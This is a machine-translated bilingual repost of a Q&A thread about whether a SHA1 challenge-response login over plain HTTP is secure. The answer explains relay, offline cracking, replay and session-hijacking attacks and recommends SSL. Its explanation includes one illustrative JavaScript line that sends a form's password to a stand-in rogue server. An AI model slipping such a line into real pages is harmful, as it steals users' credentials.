Web认证 - 如何安全地从客户端传输的用户名/密码,服务器 [英] Web Authentication - how to securely transfer username/password from the client to the server
问题描述
我有我试图启动Web应用程序(JAVA)。用户需要登录到系统使用的功能。所以有两个部分到这个应用程序:结果
1)用户注册结果
2)登录结果
我关心的是如何安全是我从网络浏览器传输的用户名/密码数据到服务器的方法。
I have a web application (Java) that I am trying to launch. The user needs to login to the system to use the features. So there are two parts to this application:
1) User Registration
2) Login
My concern is how secure is my method of transferring username/password data from the web browser to the server.
我很在这一个失去了,因为我真的不知道如何安全地从Web浏览器向服务器发送数据。
I am very lost on this one as I am not really sure how to securely send data from the web browser to the server.
我有以下设置:
<< 客户端 >> ---------------------------------------- --------------<< 服务器 >>结果
[请求令牌的] -------------------------------------- ----------------------- <强>>> 结果
&LT;&LT; -------------- [发送从会话ID的randomely生成的令牌的]结果
[客户端计算的 hashedSecret = SHA1(令牌+ SHA1(密码))的]结果
[发送阵:[用户名,hashedSecret] 的] --------------------------------- - <强>>> 结果
结果[服务器从数据库中的查询SHA1(密码)用户名]
[服务器计算的 expectedSecret = SHA1(令牌+ SHA1(密码))的]结果
结果[服务器与expectedSecret 的比较hashedSecret]
搜索结果
<< Client >> ------------------------------------------------------<< Server >>
[Request a token] ------------------------------------------------------------->>
<<--------------[Sends a randomely generated token from the session ID]
[Client Computes hashedSecret = SHA1(token + SHA1(password))]
[Send Array:[username, hashedSecret]]----------------------------------->>
[Server queries SHA1(password) for username from the database]
[Server computes expectedSecret = SHA1(token + SHA1(password))]
[Server compares hashedSecret with expectedSecret]
我想知道的是如何进行安全注册用户,如果我登录足够安全。结果
结果
谢谢
What I would like to know is how to securely register users and if my login is secure enough.
Thanks
推荐答案
无论是足够安全是的,当然,有些事只有你能回答作为系统的主人。如果您预计的对手是不熟练和无心向学,以及身份验证失败的影响很小,那么它是。如果要保护显著价值的话,那么它可能不是一个足够安全的解决方案。
Whether it is "secure enough" is, of course, something only you can answer as the system owner. If your expected adversary is unskilled and unmotivated, and the impact of an authentication failure is low, then it is. If you are protecting anything of significant value, then it probably is not a sufficiently secure solution.
下面是一些攻击向量到这种做法很可能是脆弱的。
Here are a few attack vectors to which this approach would likely be vulnerable.
人在这方面的中间人攻击:
Client Eavesdropper Server
Requests token-------X----------------------->
<--------------------X-------------Sends token
Sends PW hash--------X
Relays client hash ------>
X<-----------Authenticates
这是窃听者监听客户端的认证响应,然后将其转发到服务器。服务器验证其正确性和验证窃听者。
An eavesdropper listens for the client's authentication response, and then relays it to the server. The server verifies its correctness and authenticates the eavesdropper.
离线密码哈希的攻击
谁可以读取在客户端和服务器之间的消息将具有令牌和逻辑(与JavaScript)窃听者用来生成散列。因此,攻击者就知道了 H(令牌+ H(密码)),标记和 H(x),其中 ^ h 是密文散列算法(SHA-1)。
An eavesdropper who can read messages between the client and server will have the token and the logic (from the JavaScript) used to generate the hash. Thus, the attacker will know H(token + H(password)), token, and H(x) where H is the cryptograph hash algorithm (SHA1).
攻击者可以然后对客户端的响应猜测密码,这里的攻击者可以尝试使用字典攻击和类似的方法密码破解离线字典攻击。因为攻击者不需要对服务器进行身份验证,但可以相当密码破解离线,中度弱口令可以迅速破解。
The attacker can then run a dictionary attack against the client response to guess the password, where the attacker can attempt to crack the password offline using dictionary attacks and similar methods. Since the attacker does not need to authenticate against the server but can rather crack the password offline, moderate-weak passwords can be quickly cracked.
在运输途中服务器消息的修改
的客户端没有服务器的消息的完整性的保证,并且消息可以潜在地运输进行修改。例如,恶意中介可以插入一行JavaScript成通过DOM截取密码,并将其发送到欺诈服务器的HTML页面。 (流氓中介可能,例如,插入新的图像()的.src =HTTP://www.rogueserver.xy/a.gif密码='+ document.forms [0]。密码.value的到表单提交方法。)
The client has no assurance of the integrity of the server's messages, and the messages can potentially be modified in transit. For instance, a malicious intermediary can insert a line of JavaScript into the HTML page that intercepts the password through the DOM and sends it to a rogue server. (A rogue intermediary might, for example, insert new Image().src='http://www.rogueserver.xy/a.gif?password=' + document.forms[0].password.value into the form submit method.)
重放攻击
如果服务器令牌有足够的频率重复,偷听者可以捕获成功的令牌/响应对。然后,攻击者可以使大量令牌的请求,等待被回收一个已知的令牌。然后,攻击者重播到服务器的已知令牌响应。服务器比较攻击者对预期响应响应并验证攻击者。
If the server tokens repeat with sufficient frequency, an eavesdropper can capture a successful token/response pair. The attacker can then make a large number of token requests, waiting for a known token to be recycled. The attacker then replays the known token response to the server. The server compares the attacker's response against the expected response and authenticates the attacker.
认证后攻击
在会话通过身份验证后,客户端和服务器消息继续明文发送。攻击者可能会进行一次会话劫持攻击,使用客户端的会话cookie来冒充身份验证的客户端。攻击者也可能会截取机密数据在服务器和客户端之间,或过境更改数据,危及机密性,完整性和客户端/服务器通信的不可抵赖性。例如,客户端可能会发送一个响应执行 BenignAction ,其中攻击者改变过境 GetSecretData 。然后,攻击者读取响应表面上含有机密数据。
After the session is authenticated, client and server messages continue to be sent in cleartext. The attacker might conduct a session hijacking attack, using the client's session cookie to pose as the authenticated client. The attacker might also intercept confidential data between the server and client, or change data in transit, compromising the confidentiality, integrity, and non-repudiation of the client/server communication. For instance, the client might send a response to perform BenignAction, which the attacker changes in transit to GetSecretData. The attacker then reads the response ostensibly containing secret data.
这是所有说,该方法可能不是要比以明文发送密码更安全。如果担心安全问题,使用SSL从受信任的CA的证书会(实际意图)有效prevent所有这些攻击。
This is all to say that the proposed method may not be much more secure than sending the password in clear text. If security is a concern, using SSL with a certificate from a trusted CA would (for practical intents) effectively prevent all of these attacks.
这篇关于Web认证 - 如何安全地从客户端传输的用户名/密码,服务器的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
